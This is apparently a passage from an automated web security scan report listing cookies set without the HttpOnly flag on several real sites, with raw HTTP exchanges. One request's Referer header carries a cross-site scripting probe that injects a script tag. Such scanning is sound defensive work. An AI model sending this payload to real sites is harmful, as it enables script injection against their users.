The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main/do/Privacy_Policy HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 18:05:52 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=7d3a89d5f21954b4e37104192891668e; expires=Sun, 30 Jan 2011 18:05:52 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 18:05:52 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Connection: close
Content-Type: text/html
Content-Length: 33701

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Privacy Policy</title>
<base href="http://www.dominionenterprises.com/" />
<meta http-
...[SNIP]...

11.189. http://www.dominionenterprises.com/main/do/Terms_of_Use previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dominionenterprises.com
Path:	/main/do/Terms_of_Use

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=f55dc9f4da1f9269275d3d70f7d2e82a; expires=Sun, 30 Jan 2011 18:05:52 GMT; path=/
TSa27990=939a3b6a072740b6e33cc3abedde002f435053cfeb6a1fbb4d42fbb39c5eca85e318bc02; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /main/do/Terms_of_Use HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 18:05:52 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=f55dc9f4da1f9269275d3d70f7d2e82a; expires=Sun, 30 Jan 2011 18:05:52 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 18:05:52 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Connection: close
Content-Type: text/html
Set-Cookie: TSa27990=939a3b6a072740b6e33cc3abedde002f435053cfeb6a1fbb4d42fbb39c5eca85e318bc02; Path=/
Content-Length: 45884

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Terms of Use</title>
<base href="http://www.dominionenterprises.com/" />
<meta http-eq
...[SNIP]...

11.190. http://www.paperg.com/jsfb/embed.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.paperg.com
Path:	/jsfb/embed.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsfb/embed.php?pid=3922&bid=2123 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 15:00:05 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 39271

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL2123 = 'http://www.
...[SNIP]...

11.191. http://www.parker-software.com/forum/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.parker-software.com
Path:	/forum/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDCQSCRASQ=CIEMDCNAFMCFHFEFAKMMMFLF; path=/
WWF9lVisit=LV=2011%2D01%2D28+13%3A58%3A10; expires=Sat, 28-Jan-2012 13:58:10 GMT; path=/forum/
WWF9sID=SID=629255141c2dfczb44f2d1ea4be92fz9; path=/forum/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forum/ HTTP/1.1
Host: www.parker-software.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.192. http://www.screenthumbs.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.screenthumbs.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=03c0e7391c4e0c2e4a05965642293dcb; path=/
PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=aBnEV8qZbaO5AiPqlfEMlMp0CrY1VMO6DaxPZc430eDivvFS7bYquWjKWsEyoRZbWhm4HfJyiRUg8218umR6KSGZbrssC9JqkYBZdGOqnZcdQ0bEH1RhMnrgAKNi7tStd4DLn17NIOFpIlovT7JKoB6FfMbXjOum0y8htmV9BK4rXGvOOt2gohZaOZb1BUoF8U0MBLq85Ys9LJ8paIxGC1Y6O1y3XVZaaBJRO5a4kg8GZc4q60WBbrdEt8DAgNgdcdSchZbyWE6xZckgGgNZcZaAG3jZcGxQ6Oi8s5UHYM9f5OhZcRcGqanCGSmdp8oFwF3msZcng9YBbvZbVJXeTheW3fZb7nKtOqZb91SWJNBSOLUN7MOOHGISOhYq0wZcIKNxydoZdor6WIaGIGWQXSDVxPQgp1lDHSQq29ly7CiTxU58Zd7TGTGCVjWrb39CkZaZaVZc4E9PS8BrVtmxq4vcSFl4KbDCmeveWiPMQExZdCAuhsidGAcbnQZcvwy6HdTRUWHSNWVTPPlZcWd5PpJM3gvYsbM2K2vRXobaAZbZarGcVaH4BRuQgRf2ZcsiMpaI7VFcFLFo7wCXqNZdTroL5ZdvbW; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:32 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aBnEV8qZbaO5AiPqlfEMlMp0CrY1VMO6DaxPZc430eDivvFS7bYquWjKWsEyoRZbWhm4HfJyiRUg8218umR6KSGZbrssC9JqkYBZdGOqnZcdQ0bEH1RhMnrgAKNi7tStd4DLn17NIOFpIlovT7JKoB6FfMbXjOum0y8htmV9BK4rXGvOOt2gohZaOZb1BUoF8U0MBLq85Ys9LJ8paIxGC1Y6O1y3XVZaaBJRO5a4kg8GZc4q60WBbrdEt8DAgNgdcdSchZbyWE6xZckgGgNZcZaAG3jZcGxQ6Oi8s5UHYM9f5OhZcRcGqanCGSmdp8oFwF3msZcng9YBbvZbVJXeTheW3fZb7nKtOqZb91SWJNBSOLUN7MOOHGISOhYq0wZcIKNxydoZdor6WIaGIGWQXSDVxPQgp1lDHSQq29ly7CiTxU58Zd7TGTGCVjWrb39CkZaZaVZc4E9PS8BrVtmxq4vcSFl4KbDCmeveWiPMQExZdCAuhsidGAcbnQZcvwy6HdTRUWHSNWVTPPlZcWd5PpJM3gvYsbM2K2vRXobaAZbZarGcVaH4BRuQgRf2ZcsiMpaI7VFcFLFo7wCXqNZdTroL5ZdvbW; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:32 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=aknDc2tliMZc6Jq3DJejYVRXks2ZdIIWFZchKUTZbeGyBxqshH68M7kQS9im3XFZbmGmAZbalcqqWdniQu9QQ42kafOZa7iirBZcOF7Zc2GtEwqGKGZb8ycb8xUAMqD9xZd3p21ENgWL1F3u9vabhfoTGIWZc8dlZcw7Wg01MGsG4F3VVUM4xohgabZcisBDZbrHZcSeFrpuKPH2hgFBRscs8R9C4ZbXIJXRy6ZcTWdyLlSxmS1XZaZdGs7bWRFy6Ukcoq3dvdLfCFGZcNGYwTvBlVKg3qKZbLk3GyPrfdCy5ap8yS9KXmDy7Vpi7r2a4BZdmOibIRKZb1dgZaZb0pRyCTnsxBZatBWgDAXNNr995VLCFoPotEFaSokGZdafO7d5yklT67yN5c6JKRcAeLfsbu0enSMAvnlyb5Zd2Jf1eeXGDZaJirHZdhTi9WpZd19b8csfERi10Za1yHZaFZbnVWJmvSKd82ZabcjWZaLKfB8mttG5Zc9MM7AgQI1iOonV0DRwAtZbY8NwNP6ZcnaIVcS96V8MBdLXZcY0LZcoPlRYeRP1DmtivqWV1GOZcO06J3ZbqZbJhX6Pffu7ZcWV3T79WA9iS9; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:51 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aknDc2tliMZc6Jq3DJejYVRXks2ZdIIWFZchKUTZbeGyBxqshH68M7kQS9im3XFZbmGmAZbalcqqWdniQu9QQ42kafOZa7iirBZcOF7Zc2GtEwqGKGZb8ycb8xUAMqD9xZd3p21ENgWL1F3u9vabhfoTGIWZc8dlZcw7Wg01MGsG4F3VVUM4xohgabZcisBDZbrHZcSeFrpuKPH2hgFBRscs8R9C4ZbXIJXRy6ZcTWdyLlSxmS1XZaZdGs7bWRFy6Ukcoq3dvdLfCFGZcNGYwTvBlVKg3qKZbLk3GyPrfdCy5ap8yS9KXmDy7Vpi7r2a4BZdmOibIRKZb1dgZaZb0pRyCTnsxBZatBWgDAXNNr995VLCFoPotEFaSokGZdafO7d5yklT67yN5c6JKRcAeLfsbu0enSMAvnlyb5Zd2Jf1eeXGDZaJirHZdhTi9WpZd19b8csfERi10Za1yHZaFZbnVWJmvSKd82ZabcjWZaLKfB8mttG5Zc9MM7AgQI1iOonV0DRwAtZbY8NwNP6ZcnaIVcS96V8MBdLXZcY0LZcoPlRYeRP1DmtivqWV1GOZcO06J3ZbqZbJhX6Pffu7ZcWV3T79WA9iS9; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:51 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=aOnh31SyZaaguIvQ9UN6ORsZbuleis79XItmZb0P8atB8OjAkU8xKhtbdD6bHZaVnI2TUCe4Zd4PpZb7wHXCZaZbPZdqZdO6mo7JbLZd3xuwbZbHN538buNduG2L81ZaY5pX32oqSqf2x7N6kcPdHSVDe06Zbo85Yn01rbZbQrwZbFpMcjDq6PZaumkobfFsGD5yHWK3SNZc9eWIZbZc53SxWq1pme8CV90Nq6CBimgf4finNqZaZdpEHlnXDX1gEuqUPhN9I1mG3QkTEldbEb2stXISNA8y56Rry2JU3teeA5JyEAAKrqMmOd64bu6BZctFcu2lR2XJSV9BoymIjg3mhHZbqWlQKoZd9NcrCiAZajj2cywhZcaGo4iX5Eo8ZaUcLRUM2p7K1A3bCDJl3AYKTXTUtTBZaZdxJABe2b1xOqBGZanyrnrybc6ZcZdJKV2mpmxtZdPHVDMtNDKEnmxaeDZaDLLyY8UNVQnSYDt2FIdJvwP5myVZaGNRTZag8; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:35 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aOnh31SyZaaguIvQ9UN6ORsZbuleis79XItmZb0P8atB8OjAkU8xKhtbdD6bHZaVnI2TUCe4Zd4PpZb7wHXCZaZbPZdqZdO6mo7JbLZd3xuwbZbHN538buNduG2L81ZaY5pX32oqSqf2x7N6kcPdHSVDe06Zbo85Yn01rbZbQrwZbFpMcjDq6PZaumkobfFsGD5yHWK3SNZc9eWIZbZc53SxWq1pme8CV90Nq6CBimgf4finNqZaZdpEHlnXDX1gEuqUPhN9I1mG3QkTEldbEb2stXISNA8y56Rry2JU3teeA5JyEAAKrqMmOd64bu6BZctFcu2lR2XJSV9BoymIjg3mhHZbqWlQKoZd9NcrCiAZajj2cywhZcaGo4iX5Eo8ZaUcLRUM2p7K1A3bCDJl3AYKTXTUtTBZaZdxJABe2b1xOqBGZanyrnrybc6ZcZdJKV2mpmxtZdPHVDMtNDKEnmxaeDZaDLLyY8UNVQnSYDt2FIdJvwP5myVZaGNRTZag8; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:35 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=aVnhU0pyXRGZdet4AA9JInixYy5PW6mOZbfFNupYZbk6uRZbr02dZdrXotZbHnCs1oI3CFlhZa8vWeKEqvimhNX3Kt9j892FmLPcxZbP0kaqZawEuyaivqVjqFUhZcj4jbd60Yuegve9awYnLBq2vshOZdgkA1DZbZcLZcpJQY8ZbUYZanGapYXBfGJVl72jGv4EZcXZaXWRyi8mtQ4W6vfiaYaP00ZdoU0PlIXq5bjMkliq5On18o3kCLonUhYe9hpoTXoFBZdWIdhJUkx4TMOyZaZcloOgJZbYcLyK4ZciswqdLdXU3KEohUfhMWuUnQoqdAnh6Vf9sj0qYAlGykV6VvFCBPKNSj0x9YEevGUNn4dE9YeZacKgmLZaCjTjZdcDTYmnktgn3ExYBhxsRPtF0AAIump3x0ZagZajqkUUfIQRVAEGHQGMkmwv0s9Axh8fKLSCGl7SZd9clEgUQlk7eBuNKXFs7xl2PyNaciJKwZbXnvV7hs3qclZd; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:46 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aVnhU0pyXRGZdet4AA9JInixYy5PW6mOZbfFNupYZbk6uRZbr02dZdrXotZbHnCs1oI3CFlhZa8vWeKEqvimhNX3Kt9j892FmLPcxZbP0kaqZawEuyaivqVjqFUhZcj4jbd60Yuegve9awYnLBq2vshOZdgkA1DZbZcLZcpJQY8ZbUYZanGapYXBfGJVl72jGv4EZcXZaXWRyi8mtQ4W6vfiaYaP00ZdoU0PlIXq5bjMkliq5On18o3kCLonUhYe9hpoTXoFBZdWIdhJUkx4TMOyZaZcloOgJZbYcLyK4ZciswqdLdXU3KEohUfhMWuUnQoqdAnh6Vf9sj0qYAlGykV6VvFCBPKNSj0x9YEevGUNn4dE9YeZacKgmLZaCjTjZdcDTYmnktgn3ExYBhxsRPtF0AAIump3x0ZagZajqkUUfIQRVAEGHQGMkmwv0s9Axh8fKLSCGl7SZd9clEgUQlk7eBuNKXFs7xl2PyNaciJKwZbXnvV7hs3qclZd; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:46 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=afnFkjmge0wRusnZd7gvZcatR8ZbEScUCBDXs0j0s50GZb1NZbNHr3QTUauwUM8tQU0eWCZcJwiaT9KOt0ORNDIPwt3Fos42FUhgEgkcn6gbVL7kcYVbsSviZdk498UHG7ll0UOmZaZd03oZbIohusjqYPAOg3P9l1qIXMOOyVcIdYGSRPUWps27MXI47gapuaKm0ivgosOIrnO096QZaussCUB9yqu346N7wR4whrspZaQTuAry7D0DqkWQuEMZaR6D4ZbKvKLDWR1PA8TDijB6RZdtTUZdBnYh8ux1FrrnNPB903ZctJ4lfVtpBjNHNWBwjlOdluDCCKqFZb2brZaMZdROFQhavZcTSkZdyPSbHOIZdVYOMeiosYkFhpmMgM8aIQbfHbK3G8o6QwPyQT1FryGQ8ZcM48FyrtZd8GDZc4sCV1LqZaikES5Zb1ggkhTpxsfVYrnmvEUmhbc9Yds87sZdpP1MHN80q6G6Yp1qE3IS34IhXlTBwHfMShFhrRxjZdx7ycmCBq19hfEiJSscR3Uui17SS4Za0eKOOMWnVRHQdSddDa40Pp8UaZayWOpLbvqshOIEwbP2XJRmnLmXutTHs2ViVDZb32EHl; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:53 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
